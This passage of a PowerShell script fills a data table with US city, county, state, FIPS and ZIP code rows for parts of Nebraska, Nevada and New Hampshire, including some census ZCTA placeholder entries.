$Cities.Rows.Add("Sparks","Cherry","Nebraska","NE","31","69220") + $null = $Cities.Rows.Add("Wood lake","Cherry","Nebraska","NE","31","69221") + $null = $Cities.Rows.Add("Alliance","Box Butte","Nebraska","NE","31","69301") + $null = $Cities.Rows.Add("Angora","Morrill","Nebraska","NE","31","69331") + $null = $Cities.Rows.Add("Ashby","Grant","Nebraska","NE","31","69333") + $null = $Cities.Rows.Add("Bayard","Morrill","Nebraska","NE","31","69334") + $null = $Cities.Rows.Add("Bingham","Sheridan","Nebraska","NE","31","69335") + $null = $Cities.Rows.Add("Bridgeport","Morrill","Nebraska","NE","31","69336") + $null = $Cities.Rows.Add("Chadron","Dawes","Nebraska","NE","31","69337") + $null = $Cities.Rows.Add("Crawford","Dawes","Nebraska","NE","31","69339") + $null = $Cities.Rows.Add("Ellsworth","Sheridan","Nebraska","NE","31","69340") + $null = $Cities.Rows.Add("Gering","Scotts Bluff","Nebraska","NE","31","69341") + $null = $Cities.Rows.Add("Gordon","Sheridan","Nebraska","NE","31","69343") + $null = $Cities.Rows.Add("Harrisburg","Banner","Nebraska","NE","31","69345") + $null = $Cities.Rows.Add("Harrison","Sioux","Nebraska","NE","31","69346") + $null = $Cities.Rows.Add("Hay springs","Sheridan","Nebraska","NE","31","69347") + $null = $Cities.Rows.Add("Hemingford","Box Butte","Nebraska","NE","31","69348") + $null = $Cities.Rows.Add("Henry","Scotts Bluff","Nebraska","NE","31","69349") + $null = $Cities.Rows.Add("Hyannis","Grant","Nebraska","NE","31","69350") + $null = $Cities.Rows.Add("Lakeside","Sheridan","Nebraska","NE","31","69351") + $null = $Cities.Rows.Add("Lyman","Scotts Bluff","Nebraska","NE","31","69352") + $null = $Cities.Rows.Add("Marsland","Dawes","Nebraska","NE","31","69354") + $null = $Cities.Rows.Add("Melbeta","Scotts Bluff","Nebraska","NE","31","69355") + $null = $Cities.Rows.Add("Minatare","Scotts Bluff","Nebraska","NE","31","69356") + $null = $Cities.Rows.Add("Mitchell","Scotts Bluff","Nebraska","NE","31","69357") + $null = $Cities.Rows.Add("Morrill","Scotts Bluff","Nebraska","NE","31","69358") + $null = $Cities.Rows.Add("Rushville","Sheridan","Nebraska","NE","31","69360") + $null = $Cities.Rows.Add("Scottsbluff","Scotts Bluff","Nebraska","NE","31","69361") + $null = $Cities.Rows.Add("Whiteclay","Sheridan","Nebraska","NE","31","69365") + $null = $Cities.Rows.Add("Whitman","Grant","Nebraska","NE","31","69366") + $null = $Cities.Rows.Add("Whitney","Dawes","Nebraska","NE","31","69367") + $null = $Cities.Rows.Add("","Kimball","Nebraska","NE","31","82082") + $null = $Cities.Rows.Add("Alamo","Lincoln","Nevada","NV","32","89001") + $null = $Cities.Rows.Add("Beatty","Nye","Nevada","NV","32","89003") + $null = $Cities.Rows.Add("Blue diamond","Clark","Nevada","NV","32","89004") + $null = $Cities.Rows.Add("Boulder city","Clark","Nevada","NV","32","89005") + $null = $Cities.Rows.Add("Bunkerville","Clark","Nevada","NV","32","89007") + $null = $Cities.Rows.Add("Caliente","Lincoln","Nevada","NV","32","89008") + $null = $Cities.Rows.Add("Dyer","Esmeralda","Nevada","NV","32","89010") + $null = $Cities.Rows.Add("Henderson","Clark","Nevada","NV","32","89011") + $null = $Cities.Rows.Add("Henderson","Clark","Nevada","NV","32","89012") + $null = $Cities.Rows.Add("Goldfield","Esmeralda","Nevada","NV","32","89013") + $null = $Cities.Rows.Add("Henderson","Clark","Nevada","NV","32","89014") + $null = $Cities.Rows.Add("Henderson","Clark","Nevada","NV","32","89015") + $null = $Cities.Rows.Add("Hiko","Lincoln","Nevada","NV","32","89017") + $null = $Cities.Rows.Add("Indian springs","Clark","Nevada","NV","32","89018") + $null = $Cities.Rows.Add("Goodsprings","Clark","Nevada","NV","32","89019") + $null = $Cities.Rows.Add("Amargosa valley","Nye","Nevada","NV","32","89020") + $null = $Cities.Rows.Add("Logandale","Clark","Nevada","NV","32","89021") + $null = $Cities.Rows.Add("Manhattan","Nye","Nevada","NV","32","89022") + $null = $Cities.Rows.Add("Moapa","Clark","Nevada","NV","32","89025") + $null = $Cities.Rows.Add("Zcta 89027","Clark","Nevada","NV","32","89027") + $null = $Cities.Rows.Add("Laughlin","Clark","Nevada","NV","32","89028") + $null = $Cities.Rows.Add("Laughlin","Clark","Nevada","NV","32","89029") + $null = $Cities.Rows.Add("North las vegas","Clark","Nevada","NV","32","89030") + $null = $Cities.Rows.Add("North las vegas","Clark","Nevada","NV","32","89031") + $null = $Cities.Rows.Add("North las vegas","Clark","Nevada","NV","32","89032") + $null = $Cities.Rows.Add("Cal nev ari","Clark","Nevada","NV","32","89039") + $null = $Cities.Rows.Add("Overton","Clark","Nevada","NV","32","89040") + $null = $Cities.Rows.Add("Panaca","Lincoln","Nevada","NV","32","89042") + $null = $Cities.Rows.Add("Pioche","Lincoln","Nevada","NV","32","89043") + $null = $Cities.Rows.Add("Cottonwood cove","Clark","Nevada","NV","32","89046") + $null = $Cities.Rows.Add("Silverpeak","Esmeralda","Nevada","NV","32","89047") + $null = $Cities.Rows.Add("Zcta 89048","Nye","Nevada","NV","32","89048") + $null = $Cities.Rows.Add("Tonopah","Nye","Nevada","NV","32","89049") + $null = $Cities.Rows.Add("Zcta 89052","Clark","Nevada","NV","32","89052") + $null = $Cities.Rows.Add("Zcta 890hh","Clark","Nevada","NV","32","890HH") + $null = $Cities.Rows.Add("Zcta 890xx","Clark","Nevada","NV","32","890XX") + $null = $Cities.Rows.Add("Las vegas","Clark","Nevada","NV","32","89101") + $null = $Cities.Rows.Add("Las vegas","Clark","Nevada","NV","32","89102") + $null = $Cities.Rows.Add("Las vegas","Clark","Nevada","NV","32","89103") + $null = $Cities.Rows.Add("Las vegas","Clark","Nevada","NV","32","89104") + $null = $Cities.Rows.Add("Las vegas","Clark","Nevada","NV","32","89106") + $null = $Cities.Rows.Add("Las vegas","Clark","Nevada","NV","32","89107") + $null = $Cities.Rows.Add("Las vegas","Clark","Nevada","NV","32","89108") + $null = $Cities.Rows.Add("Las vegas","Clark","Nevada","NV","32","89109") + $null = $Cities.Rows.Add("Las vegas","Clark","Nevada","NV","32","89110") + $null = $Cities.Rows.Add("Las vegas","Clark","Nevada","NV","32","89113") + $null = $Cities.Rows.Add("Las vegas","Clark","Nevada","NV","32","89115") + $null = $Cities.Rows.Add("Las vegas","Clark","Nevada","NV","32","89117") + $null = $Cities.Rows.Add("Las vegas","Clark","Nevada","NV","32","89118") + $null = $Cities.Rows.Add("Las vegas","Clark","Nevada","NV","32","89119") + $null = $Cities.Rows.Add("Las vegas","Clark","Nevada","NV","32","89120") + $null = $Cities.Rows.Add("Las vegas","Clark","Nevada","NV","32","89121") + $null = $Cities.Rows.Add("Las vegas","Clark","Nevada","NV","32","89122") + $null = $Cities.Rows.Add("Las vegas","Clark","Nevada","NV","32","89123") + $null = $Cities.Rows.Add("Las vegas","Clark","Nevada","NV","32","89124") + $null = $Cities.Rows.Add("Las vegas","Clark","Nevada","NV","32","89128") + $null = $Cities.Rows.Add("Las vegas","Clark","Nevada","NV","32","89129") + $null = $Cities.Rows.Add("Las vegas","Clark","Nevada","NV","32","89130") + $null = $Cities.Rows.Add("Las vegas","Clark","Nevada","NV","32","89131") + $null = $Cities.Rows.Add("Las vegas","Clark","Nevada","NV","32","89134") + $null = $Cities.Rows.Add("Las vegas","Clark","Nevada","NV","32","89135") + $null = $Cities.Rows.Add("Las vegas","Clark","Nevada","NV","32","89139") + $null = $Cities.Rows.Add("Zcta 89141","Clark","Nevada","NV","32","89141") + $null = $Cities.Rows.Add("Zcta 89142","Clark","Nevada","NV","32","89142") + $null = $Cities.Rows.Add("Zcta 89143","Clark","Nevada","NV","32","89143") + $null = $Cities.Rows.Add("Zcta 89144","Clark","Nevada","NV","32","89144") + $null = $Cities.Rows.Add("Zcta 89145","Clark","Nevada","NV","32","89145") + $null = $Cities.Rows.Add("Zcta 89146","Clark","Nevada","NV","32","89146") + $null = $Cities.Rows.Add("Zcta 89147","Clark","Nevada","NV","32","89147") + $null = $Cities.Rows.Add("Zcta 89148","Clark","Nevada","NV","32","89148") + $null = $Cities.Rows.Add("Zcta 89149","Clark","Nevada","NV","32","89149") + $null = $Cities.Rows.Add("Zcta 89156","Clark","Nevada","NV","32","89156") + $null = $Cities.Rows.Add("Nellis a f b","Clark","Nevada","NV","32","89191") + $null = $Cities.Rows.Add("Zcta 891xx","Clark","Nevada","NV","32","891XX") + $null = $Cities.Rows.Add("Ely","White Pine","Nevada","NV","32","89301") + $null = $Cities.Rows.Add("Austin","Lander","Nevada","NV","32","89310") + $null = $Cities.Rows.Add("Baker","White Pine","Nevada","NV","32","89311") + $null = $Cities.Rows.Add("Duckwater","Nye","Nevada","NV","32","89314") + $null = $Cities.Rows.Add("Eureka","Eureka","Nevada","NV","32","89316") + $null = $Cities.Rows.Add("Lund","White Pine","Nevada","NV","32","89317") + $null = $Cities.Rows.Add("Mc gill","White Pine","Nevada","NV","32","89318") + $null = $Cities.Rows.Add("Zcta 893hh","White Pine","Nevada","NV","32","893HH") + $null = $Cities.Rows.Add("Zcta 893xx","White Pine","Nevada","NV","32","893XX") + $null = $Cities.Rows.Add("Dayton","Lyon","Nevada","NV","32","89403") + $null = $Cities.Rows.Add("Denio","Humboldt","Nevada","NV","32","89404") + $null = $Cities.Rows.Add("Empire","Washoe","Nevada","NV","32","89405") + $null = $Cities.Rows.Add("Fallon","Churchill","Nevada","NV","32","89406") + $null = $Cities.Rows.Add("Fernley","Lyon","Nevada","NV","32","89408") + $null = $Cities.Rows.Add("Gabbs","Nye","Nevada","NV","32","89409") + $null = $Cities.Rows.Add("Gardnerville","Douglas","Nevada","NV","32","89410") + $null = $Cities.Rows.Add("Genoa","Douglas","Nevada","NV","32","89411") + $null = $Cities.Rows.Add("Glenbrook","Douglas","Nevada","NV","32","89413") + $null = $Cities.Rows.Add("Golconda","Humboldt","Nevada","NV","32","89414") + $null = $Cities.Rows.Add("Hawthorne","Mineral","Nevada","NV","32","89415") + $null = $Cities.Rows.Add("Unionville","Pershing","Nevada","NV","32","89418") + $null = $Cities.Rows.Add("Lovelock","Pershing","Nevada","NV","32","89419") + $null = $Cities.Rows.Add("Luning","Mineral","Nevada","NV","32","89420") + $null = $Cities.Rows.Add("Mc dermitt","Humboldt","Nevada","NV","32","89421") + $null = $Cities.Rows.Add("Mina","Mineral","Nevada","NV","32","89422") + $null = $Cities.Rows.Add("Minden","Douglas","Nevada","NV","32","89423") + $null = $Cities.Rows.Add("Nixon","Washoe","Nevada","NV","32","89424") + $null = $Cities.Rows.Add("Orovada","Humboldt","Nevada","NV","32","89425") + $null = $Cities.Rows.Add("Paradise valley","Humboldt","Nevada","NV","32","89426") + $null = $Cities.Rows.Add("Schurz","Mineral","Nevada","NV","32","89427") + $null = $Cities.Rows.Add("Silver city","Lyon","Nevada","NV","32","89428") + $null = $Cities.Rows.Add("Silver springs","Lyon","Nevada","NV","32","89429") + $null = $Cities.Rows.Add("Smith","Lyon","Nevada","NV","32","89430") + $null = $Cities.Rows.Add("Sparks","Washoe","Nevada","NV","32","89431") + $null = $Cities.Rows.Add("Sun valley","Washoe","Nevada","NV","32","89433") + $null = $Cities.Rows.Add("Sparks","Washoe","Nevada","NV","32","89434") + $null = $Cities.Rows.Add("Sparks","Washoe","Nevada","NV","32","89436") + $null = $Cities.Rows.Add("Verdi","Washoe","Nevada","NV","32","89439") + $null = $Cities.Rows.Add("Virginia city","Storey","Nevada","NV","32","89440") + $null = $Cities.Rows.Add("Wadsworth","Washoe","Nevada","NV","32","89442") + $null = $Cities.Rows.Add("Wellington","Douglas","Nevada","NV","32","89444") + $null = $Cities.Rows.Add("Winnemucca","Humboldt","Nevada","NV","32","89445") + $null = $Cities.Rows.Add("Yerington","Lyon","Nevada","NV","32","89447") + $null = $Cities.Rows.Add("Zephyr cove","Douglas","Nevada","NV","32","89448") + $null = $Cities.Rows.Add("Stateline","Douglas","Nevada","NV","32","89449") + $null = $Cities.Rows.Add("Incline village","Washoe","Nevada","NV","32","89451") + $null = $Cities.Rows.Add("Zcta 894hh","Douglas","Nevada","NV","32","894HH") + $null = $Cities.Rows.Add("Zcta 894xx","Washoe","Nevada","NV","32","894XX") + $null = $Cities.Rows.Add("Reno","Washoe","Nevada","NV","32","89501") + $null = $Cities.Rows.Add("Reno","Washoe","Nevada","NV","32","89502") + $null = $Cities.Rows.Add("Reno","Washoe","Nevada","NV","32","89503") + $null = $Cities.Rows.Add("Reno","Washoe","Nevada","NV","32","89506") + $null = $Cities.Rows.Add("Reno","Washoe","Nevada","NV","32","89509") + $null = $Cities.Rows.Add("Reno","Washoe","Nevada","NV","32","89510") + $null = $Cities.Rows.Add("Reno","Washoe","Nevada","NV","32","89511") + $null = $Cities.Rows.Add("Reno","Washoe","Nevada","NV","32","89512") + $null = $Cities.Rows.Add("Reno","Washoe","Nevada","NV","32","89523") + $null = $Cities.Rows.Add("Zcta 895xx","Washoe","Nevada","NV","32","895XX") + $null = $Cities.Rows.Add("Carson city","Carson City","Nevada","NV","32","89701") + $null = $Cities.Rows.Add("Carson city","Carson City","Nevada","NV","32","89703") + $null = $Cities.Rows.Add("Carson city","Washoe","Nevada","NV","32","89704") + $null = $Cities.Rows.Add("Carson city","Douglas","Nevada","NV","32","89705") + $null = $Cities.Rows.Add("Moundhouse","Carson City","Nevada","NV","32","89706") + $null = $Cities.Rows.Add("Zcta 897hh","Carson City","Nevada","NV","32","897HH") + $null = $Cities.Rows.Add("Zcta 897xx","Carson City","Nevada","NV","32","897XX") + $null = $Cities.Rows.Add("Jiggs","Elko","Nevada","NV","32","89801") + $null = $Cities.Rows.Add("Elko","Elko","Nevada","NV","32","89803") + $null = $Cities.Rows.Add("Zcta 89815","Elko","Nevada","NV","32","89815") + $null = $Cities.Rows.Add("Battle mountain","Lander","Nevada","NV","32","89820") + $null = $Cities.Rows.Add("Beowawe","Eureka","Nevada","NV","32","89821") + $null = $Cities.Rows.Add("Carlin","Elko","Nevada","NV","32","89822") + $null = $Cities.Rows.Add("Deeth","Elko","Nevada","NV","32","89823") + $null = $Cities.Rows.Add("Halleck","Elko","Nevada","NV","32","89824") + $null = $Cities.Rows.Add("Jackpot","Elko","Nevada","NV","32","89825") + $null = $Cities.Rows.Add("Jarbidge","Elko","Nevada","NV","32","89826") + $null = $Cities.Rows.Add("Lamoille","Elko","Nevada","NV","32","89828") + $null = $Cities.Rows.Add("Montello","Elko","Nevada","NV","32","89830") + $null = $Cities.Rows.Add("Mountain city","Elko","Nevada","NV","32","89831") + $null = $Cities.Rows.Add("Owyhee","Elko","Nevada","NV","32","89832") + $null = $Cities.Rows.Add("Ruby valley","Elko","Nevada","NV","32","89833") + $null = $Cities.Rows.Add("Tuscarora","Elko","Nevada","NV","32","89834") + $null = $Cities.Rows.Add("Oasis","Elko","Nevada","NV","32","89835") + $null = $Cities.Rows.Add("Wendover","Elko","Nevada","NV","32","89883") + $null = $Cities.Rows.Add("Zcta 898xx","Elko","Nevada","NV","32","898XX") + $null = $Cities.Rows.Add("Amherst","Hillsborough","New hampshire","NH","33","03031") + $null = $Cities.Rows.Add("Auburn","Rockingham","New hampshire","NH","33","03032") + $null = $Cities.Rows.Add("Brookline","Hillsborough","New hampshire","NH","33","03033") + $null = $Cities.Rows.Add("Candia","Rockingham","New hampshire","NH","33","03034") + $null = $Cities.Rows.Add("Chester","Rockingham","New hampshire","NH","33","03036") + $null = $Cities.Rows.Add("Deerfield","Rockingham","New hampshire","NH","33","03037") + $null = $Cities.Rows.Add("Derry","Rockingham","New hampshire","NH","33","03038") + $null = $Cities.Rows.Add("Epping","Rockingham","New hampshire","NH","33","03042") + $null = $Cities.Rows.Add("Francestown","Hillsborough","New hampshire","NH","33","03043") + $null = $Cities.Rows.Add("Fremont","Rockingham","New hampshire","NH","33","03044") + $null = $Cities.Rows.Add("Dunbarton","Hillsborough","New hampshire","NH","33","03045") + $null = $Cities.Rows.Add("Greenfield","Hillsborough","New hampshire","NH","33","03047") + $null = $Cities.Rows.Add("Mason","Hillsborough","New hampshire","NH","33","03048") + $null = $Cities.Rows.Add("Hollis","Hillsborough","New hampshire","NH","33","03049") + $null = $Cities.Rows.Add("Hudson","Hillsborough","New hampshire","NH","33","03051") + $null = $Cities.Rows.Add("Zcta 03052","Hillsborough","New hampshire","NH","33","03052") + $null = $Cities.Rows.Add("Londonderry","Rockingham","New hampshire","NH","33","03053") + $null = $Cities.Rows.Add("Merrimack","Hillsborough","New hampshire","NH","33","03054") + $null = $Cities.Rows.Add("Milford","Hillsborough","New hampshire","NH","33","03055") + $null = $Cities.Rows.Add("Mont vernon","Hillsborough","New hampshire","NH","33","03057") + $null = $Cities.Rows.Add("Nashua","Hillsborough","New hampshire","NH","33","03060") + $null = $Cities.Rows.Add("Nashua","Hillsborough","New hampshire","NH","33","03062") + $null = $Cities.Rows.Add("Nashua","Hillsborough","New hampshire","NH","33","03063") + $null = $Cities.Rows.Add("Zcta 03064","Hillsborough","New hampshire","NH","33","03064") + $null = $Cities.Rows.Add("New boston","Hillsborough","New hampshire","NH","33","03070") + $null = $Cities.Rows.Add("New ipswich","Hillsborough","New hampshire","NH","33","03071") + $null = $Cities.Rows.Add("Pelham","Hillsborough","New hampshire","NH","33","03076") + $null = $Cities.Rows.Add("Raymond","Rockingham","New hampshire","NH","33","03077") + $null = $Cities.Rows.Add("Salem","Rockingham","New hampshire","NH","33","03079") + $null = $Cities.Rows.Add("Lyndeborough","Hillsborough","New hampshire","NH","33","03082") + $null = $Cities.Rows.Add("Temple","Hillsborough","New hampshire","NH","33","03084") + $null = $Cities.Rows.Add("Wilton","Hillsborough","New hampshire","NH","33","03086") + $null = $Cities.Rows.Add("Windham","Rockingham","New hampshire","NH","33","03087") + $null = $Cities.Rows.Add("Zcta 030hh","Hillsborough","New hampshire","NH","33","030HH") + $null = $Cities.Rows.Add("Manchester","Hillsborough","New hampshire","NH","33","03101") + $null = $Cities.Rows.Add("Manchester","Hillsborough","New hampshire","NH","33","03102") + $null = $Cities.Rows.Add("Manchester","Hillsborough","New hampshire","NH","33","03103") + $null = $Cities.Rows.Add("Manchester","Hillsborough","New hampshire","NH","33","03104") + $null = $Cities.Rows.Add("Hooksett","Merrimack","New hampshire","NH","33","03106") + $null = $Cities.Rows.Add("Manchester","Hillsborough","New hampshire","NH","33","03109") + $null = $Cities.Rows.Add("Bedford","Hillsborough","New hampshire","NH","33","03110") + $null = $Cities.Rows.Add("Zcta 031hh","Hillsborough","New hampshire","NH","33","031HH") + $null = $Cities.Rows.Add("Waterville valle","Grafton","New hampshire","NH","33","03215") + $null = $Cities.Rows.Add("Andover","Merrimack","New hampshire","NH","33","03216") + $null = $Cities.Rows.Add("Ashland","Grafton","New hampshire","NH","33","03217") + $null = $Cities.Rows.Add("Barnstead","Belknap","New hampshire","NH","33","03218") + $null = $Cities.Rows.Add("Belmont","Belknap","New hampshire","NH","33","03220") + $null = $Cities.Rows.Add("Bradford","Merrimack","New hampshire","NH","33","03221") + $null = $Cities.Rows.Add("Bristol","Grafton","New hampshire","NH","33","03222") + $null = $Cities.Rows.Add("Beebe river","Grafton","New hampshire","NH","33","03223") + $null = $Cities.Rows.Add("Canterbury","Merrimack","New hampshire","NH","33","03224") + $null = $Cities.Rows.Add("Center barnstead","Belknap","New hampshire","NH","33","03225") + $null = $Cities.Rows.Add("Center harbor","Belknap","New hampshire","NH","33","03226") + $null = $Cities.Rows.Add("Center sandwich","Carroll","New hampshire","NH","33","03227") + $null = $Cities.Rows.Add("Hopkinton","Merrimack","New hampshire","NH","33","03229") + $null = $Cities.Rows.Add("Danbury","Merrimack","New hampshire","NH","33","03230") + $null = $Cities.Rows.Add("Elkins","Merrimack","New hampshire","NH","33","03233") + $null = $Cities.Rows.Add("Epsom","Merrimack","New hampshire","NH","33","03234") + $null = $Cities.Rows.Add("Franklin","Merrimack","New hampshire","NH","33","03235") + $null = $Cities.Rows.Add("Gilmanton","Belknap","New hampshire","NH","33","03237") + $null = $Cities.Rows.Add("Grafton","Grafton","New hampshire","NH","33","03240") + $null = $Cities.Rows.Add("Hebron","Grafton","New hampshire","NH","33","03241") + $null = $Cities.Rows.Add("Henniker","Merrimack","New hampshire","NH","33","03242") + $null = $Cities.Rows.Add("Hill","Merrimack","New hampshire","NH","33","03243") + $null = $Cities.Rows.Add("Hillsboro","Hillsborough","New hampshire","NH","33","03244") + $null = $Cities.Rows.Add("Gilford","Belknap","New hampshire","NH","33","03246") + $null = $Cities.Rows.Add("Lincoln","Grafton","New hampshire","NH","33","03251") + $null = $Cities.Rows.Add("Meredith","Belknap","New hampshire","NH","33","03253") + $null = $Cities.Rows.Add("Moultonborough","Carroll","New hampshire","NH","33","03254") + $null = $Cities.Rows.Add("Newbury","Merrimack","New hampshire","NH","33","03255") + $null = $Cities.Rows.Add("New hampton","Belknap","New hampshire","NH","33","03256") + $null = $Cities.Rows.Add("New london","Merrimack","New hampshire","NH","33","03257") + $null = $Cities.Rows.Add("North sandwich","Carroll","New hampshire","NH","33","03259") + $null = $Cities.Rows.Add("North sutton","Merrimack","New hampshire","NH","33","03260") + $null = $Cities.Rows.Add("Northwood","Rockingham","New hampshire","NH","33","03261") + $null = $Cities.Rows.Add("North woodstock","Grafton","New hampshire","NH","33","03262") + $null = $Cities.Rows.Add("Pittsfield","Merrimack","New hampshire","NH","33","03263") + $null = $Cities.Rows.Add("Plymouth","Grafton","New hampshire","NH","33","03264") + $null = $Cities.Rows.Add("Rumney","Grafton","New hampshire","NH","33","03266") + $null = $Cities.Rows.Add("Salisbury","Merrimack","New hampshire","NH","33","03268") + $null = $Cities.Rows.Add("Sanbornton","Belknap","New hampshire","NH","33","03269") + $null = $Cities.Rows.Add("South sutton","Merrimack","New hampshire","NH","33","03273") + $null = $Cities.Rows.Add("Allenstown","Merrimack","New hampshire","NH","33","03275") + $null = $Cities.Rows.Add("Tilton","Merrimack","New hampshire","NH","33","03276") + $null = $Cities.Rows.Add("Warner","Merrimack","New hampshire","NH","33","03278") + $null = $Cities.Rows.Add("Warren","Grafton","New hampshire","NH","33","03279") + $null = $Cities.Rows.Add("Washington","Sullivan","New hampshire","NH","33","03280") + $null = $Cities.Rows.Add("Weare","Hillsborough","New hampshire","NH","33","03281") + $null = $Cities.Rows.Add("Wentworth","Grafton","New hampshire","NH","33","03282") + $null = $Cities.Rows.Add("West springfield","Sullivan","New hampshire","NH","33","03284") + $null = $Cities.Rows.Add("Wilmot flat","Merrimack","New hampshire","NH","33","03287") + $null = $Cities.Rows.Add("Nottingham","Rockingham","New hampshire","NH","33","03290") + $null = $Cities.Rows.Add("West nottingham","Rockingham","New hampshire","NH","33","03291") + $null = $Cities.Rows.Add("Zcta 032hh","Belknap","New hampshire","NH","33","032HH") + $null = $Cities.Rows.Add("Zcta 032xx","Grafton","New hampshire","NH","33","032XX") + $null = $Cities.Rows.Add("Concord","Merrimack","New hampshire","NH","33","03301") + $null = $Cities.Rows.Add("Boscawen","Merrimack","New hampshire","NH","33","03303") + $null = $Cities.Rows.Add("Bow","Merrimack","New hampshire","NH","33","03304") + $null = $Cities.Rows.Add("Zcta 03307","Merrimack","New hampshire","NH","33","03307") + $null = $Cities.Rows.Add("Zcta 033hh","Merrimack","New hampshire","NH","33","033HH") + $null = $Cities.Rows.Add("Surry","Cheshire","New hampshire","NH","33","03431") + $null = $Cities.Rows.Add("Antrim","Hillsborough","New hampshire","NH","33","03440") + $null = $Cities.Rows.Add("Ashuelot","Cheshire","New hampshire","NH","33","03441") + $null = $Cities.Rows.Add("Bennington","Hillsborough","New hampshire","NH","33","03442") + $null = $Cities.Rows.Add("Chesterfield","Cheshire","New hampshire","NH","33","03443") + $null = $Cities.Rows.Add("Dublin","Cheshire","New hampshire","NH","33","03444") + $null = $Cities.Rows.Add("East sullivan","Cheshire","New hampshire","NH","33","03445") + $null = $Cities.Rows.Add("East swanzey","Cheshire","New hampshire","NH","33","03446") + $null = $Cities.Rows.Add("Fitzwilliam","Cheshire","New hampshire","NH","33","03447") + $null = $Cities.Rows.Add("Gilsum","Cheshire","New hampshire","NH","33","03448") + $null = $Cities.Rows.Add("Hancock","Hillsborough","New hampshire","NH","33","03449") + $null = $Cities.Rows.Add("Harrisville","Cheshire","New hampshire","NH","33","03450") + $null = $Cities.Rows.Add("Hinsdale","Cheshire","New hampshire","NH","33","03451") + $null = $Cities.Rows.Add("Jaffrey","Cheshire","New hampshire","NH","33","03452") + $null = $Cities.Rows.Add("Marlborough","Cheshire","New hampshire","NH","33","03455") + $null = $Cities.Rows.Add("Marlow","Cheshire","New hampshire","NH","33","03456") + $null = $Cities.Rows.Add("Munsonville","Cheshire","New hampshire","NH","33","03457") + $null = $Cities.Rows.Add("Peterborough","Hillsborough","New hampshire","NH","33","03458") + $null = $Cities.Rows.Add("Rindge","Cheshire","New hampshire","NH","33","03461") + $null = $Cities.Rows.Add("Spofford","Cheshire","New hampshire","NH","33","03462") + $null = $Cities.Rows.Add("Stoddard","Cheshire","New hampshire","NH","33","03464") + $null = $Cities.Rows.Add("Troy","Cheshire","New hampshire","NH","33","03465") + $null = $Cities.Rows.Add("West chesterfiel","Cheshire","New hampshire","NH","33","03466") + $null = $Cities.Rows.Add("Westmoreland","Cheshire","New hampshire","NH","33","03467") + $null = $Cities.Rows.Add("Richmond","Cheshire","New hampshire","NH","33","03470") + $null = $Cities.Rows.Add("Zcta 034hh","Hillsborough","New hampshire","NH","33","034HH") + $null = $Cities.Rows.Add("Littleton","Grafton","New hampshire","NH","33","03561") + $null = $Cities.Rows.Add("Berlin","Coos","New hampshire","NH","33","03570") + $null = $Cities.Rows.Add("Bethlehem","Grafton","New hampshire","NH","33","03574") + $null = $Cities.Rows.Add("Colebrook","Coos","New hampshire","NH","33","03576") + $null = $Cities.Rows.Add("Errol","Coos","New hampshire","NH","33","03579") + $null = $Cities.Rows.Add("Franconia","Grafton","New hampshire","NH","33","03580") + $null = $Cities.Rows.Add("Gorham","Coos","New hampshire","NH","33","03581") + $null = $Cities.Rows.Add("Groveton","Coos","New hampshire","NH","33","03582") + $null = $Cities.Rows.Add("Jefferson","Coos","New hampshire","NH","33","03583") + $null = $Cities.Rows.Add("Lancaster","Coos","New hampshire","NH","33","03584") + $null = $Cities.Rows.Add("Lisbon","Grafton","New hampshire","NH","33","03585") + $null = $Cities.Rows.Add("Milan","Coos","New hampshire","NH","33","03588") + $null = $Cities.Rows.Add("North stratford","Coos","New hampshire","NH","33","03590") + $null = $Cities.Rows.Add("Pittsburg","Coos","New hampshire","NH","33","03592") + $null = $Cities.Rows.Add("Twin mountain","Coos","New hampshire","NH","33","03595") + $null = $Cities.Rows.Add("Whitefield","Coos","New hampshire","NH","33","03598") + $null = $Cities.Rows.Add("Zcta 035hh","Coos","New hampshire","NH","33","035HH") + $null = $Cities.Rows.Add("Zcta 035xx","Coos","New hampshire","NH","33","035XX") + $null = $Cities.Rows.Add("Acworth","Sullivan","New hampshire","NH","33","03601") + $null = $Cities.Rows.Add("Alstead","Cheshire","New hampshire","NH","33","03602") + $null = $Cities.Rows.Add("Charlestown","Sullivan","New hampshire","NH","33","03603") + $null = $Cities.Rows.Add("East lempster","Sullivan","New hampshire","NH","33","03605") + $null = $Cities.Rows.Add("South acworth","Sullivan","New hampshire","NH","33","03607") + $null = $Cities.Rows.Add("Walpole","Cheshire","New hampshire","NH","33","03608") + $null = $Cities.Rows.Add("North walpole","Cheshire","New hampshire","NH","33","03609") + $null = $Cities.Rows.Add("Zcta 036hh","Sullivan","New hampshire","NH","33","036HH") + $null = $Cities.Rows.Add("Canaan","Grafton","New hampshire","NH","33","03741") + $null = $Cities.Rows.Add("Claremont","Sullivan","New hampshire","NH","33","03743") + $null = $Cities.Rows.Add("Cornish","Sullivan","New hampshire","NH","33","03745") + $null = $Cities.Rows.Add("Enfield","Grafton","New hampshire","NH","33","03748") + $null = $Cities.Rows.Add("Etna","Grafton","New hampshire","NH","33","03750") + $null = $Cities.Rows.Add("Georges mills","Sullivan","New hampshire","NH","33","03751") + $null = $Cities.Rows.Add("Goshen","Sullivan","New hampshire","NH","33","03752") + $null = $Cities.Rows.Add("Grantham","Sullivan","New hampshire","NH","33","03753") + $null = $Cities.Rows.Add("Hanover","Grafton","New hampshire","NH","33","03755") + $null = $Cities.Rows.Add("Haverhill","Grafton","New hampshire","NH","33","03765") + $null = $Cities.Rows.Add("Lebanon","Grafton","New hampshire","NH","33","03766") + $null = $Cities.Rows.Add("Lyme","Grafton","New hampshire","NH","33","03768") + $null = $Cities.Rows.Add("Meriden","Sullivan","New hampshire","NH","33","03770") + $null = $Cities.Rows.Add("Monroe","Grafton","New hampshire","NH","33","03771") + $null = $Cities.Rows.Add("Newport","Sullivan","New hampshire","NH","33","03773") + $null = $Cities.Rows.Add("North haverhill","Grafton","New hampshire","NH","33","03774") + $null = $Cities.Rows.Add("Orford","Grafton","New hampshire","NH","33","03777") + $null = $Cities.Rows.Add("Piermont","Grafton","New hampshire","NH","33","03779") + $null = $Cities.Rows.Add("Pike","Grafton","New hampshire","NH","33","03780") + $null = $Cities.Rows.Add("Plainfield","Sullivan","New hampshire","NH","33","03781") + $null = $Cities.Rows.Add("Sunapee","Sullivan","New hampshire","NH","33","03782") + $null = $Cities.Rows.Add("West lebanon","Grafton","New hampshire","NH","33","03784") + $null = $Cities.Rows.Add("Woodsville","Grafton","New hampshire","NH","33","03785") + $null = $Cities.Rows.Add("Zcta 037hh","Grafton","New hampshire","NH","33","037HH") + $null = $Cities.Rows.Add("Newington","Rockingham","New hampshire","NH","33","03801") + $null = $Cities.Rows.Add("Alton","Belknap","New hampshire","NH","33","03809") + $null = $Cities.Rows.Add("Alton 